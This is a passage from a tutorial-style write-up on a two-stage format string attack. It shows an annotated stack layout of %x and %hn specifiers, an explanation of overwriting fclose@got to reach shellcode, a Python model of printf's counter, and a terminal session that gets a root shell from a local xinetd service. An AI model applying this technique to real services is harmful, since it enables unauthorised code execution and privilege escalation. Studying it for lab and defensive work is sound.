0xbffff7b0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%1916x)
0xbffff7c0: 0x0804a00e .......... .......... .......... // (%hn) (%8x) (%8x) (%8x)
0xbffff7d0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x)
0xbffff7e0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x)
0xbffff7f0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x)
0xbffff800: .......... 0x0804a00c .......... .......... // (%39460x) (%hn)
..........................................................................
-----------------------------------------------------------------------------

At the stack slot holding the fclose@got address prepared in the first stage, the "%hn" conversion is used. "%hn" stores the low 2 bytes (0xa2a0) of the count printed so far, 0x0805a2a0, into fclose@got. The value held in fclose@got has now become 0x0804a2a0. Since 0x0804a2a0 holds the NOP sled and SHELLCODE, the next call through fclose@plt executes the SHELLCODE and yields a shell. The theory holds at every step, so let's run the binary as an xinetd service and attack it remotely with the exploit presented above.
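As an added example that is not part of the original write-up, the Python below models printf's character counter and re-derives the second-stage widths and "%hn" writes from the values given above (fclose@got, its original contents, and the count after "%24562x"); the function and variable names are mine, and nothing here touches a real process.

```python
# Added example, not code from the original write-up: a model of printf's
# character counter that re-derives the padding widths and %hn writes the
# walkthrough above describes. All constants are the write-up's own values;
# nothing here touches a real process.

FCLOSE_GOT = 0x0804a00c        # fclose@got in the write-up
ORIGINAL_GOT = 0x080483e2      # value in fclose@got before the writes
STAGE2_START = 0x08050000      # count right after the "%24562x" pad

def width_for(count, target_half):
    """Pad width so that (count + width) & 0xffff == target_half."""
    return (target_half - count) & 0xffff

def run_specs(count, specs):
    """Walk conversion specs: ("pad", n) prints n chars and consumes a word,
    ("hn", addr) stores the low 16 bits of count at addr. Returns the new
    count and the list of (addr, halfword) writes."""
    writes = []
    for kind, arg in specs:
        if kind == "pad":
            count += arg
        elif kind == "hn":
            writes.append((arg, count & 0xffff))
    return count, writes

def apply_writes(word, base, writes):
    """Apply halfword writes to the 32-bit little-endian word at base."""
    for addr, half in writes:
        shift = (addr - base) * 8      # 0 for base, 16 for base+2
        word = (word & ~(0xffff << shift)) | (half << shift)
    return word & 0xffffffff

def walkthrough():
    """Reproduce the second stage exactly as the write-up lays it out."""
    specs = [("pad", 8)] * 17 + [("pad", 1916), ("hn", FCLOSE_GOT + 2)]
    specs += [("pad", 8)] * 15 + [("pad", 39460), ("hn", FCLOSE_GOT)]
    count, writes = run_specs(STAGE2_START, specs)
    return {"count": count,
            "writes": writes,
            "got": apply_writes(ORIGINAL_GOT, FCLOSE_GOT, writes)}

if __name__ == "__main__":
    r = walkthrough()
    print(hex(r["count"]), [(hex(a), hex(v)) for a, v in r["writes"]], hex(r["got"]))
```

The first "%hn" rewrites the upper halfword with the 0x0804 it already held, which is why the GOT entry only changes after the second write.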
-----------------------------------------------------------------------------
pwn3r@ubuntu:~/DSFSA$ (./exploit.py ;cat) | nc localhost 7890
id
uid=0(root) gid=0(root)
-----------------------------------------------------------------------------

Dead clean :) Of course, ASLR and NX are disabled here, so plain SHELLCODE was enough; had ASLR and NX been enabled, the attack would have had to use ROP. This demonstrates the Double Staged Format String Attack: even when the stack holds no controllable value, an FSB payload is used to place usable arguments on the stack, and those arguments are then used for the write.

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
━[0x04 Conclusion]━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Some readers may already know this, but I judged it a very innovative technique and so decided to document it. The term "Double Staged Format String Attack" was coined purely for convenience, not to claim "this is a killer technique" :) I hope readers use this technique to write some stylish Format String Exploits, and I thank mongii for permitting me to write it up.

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━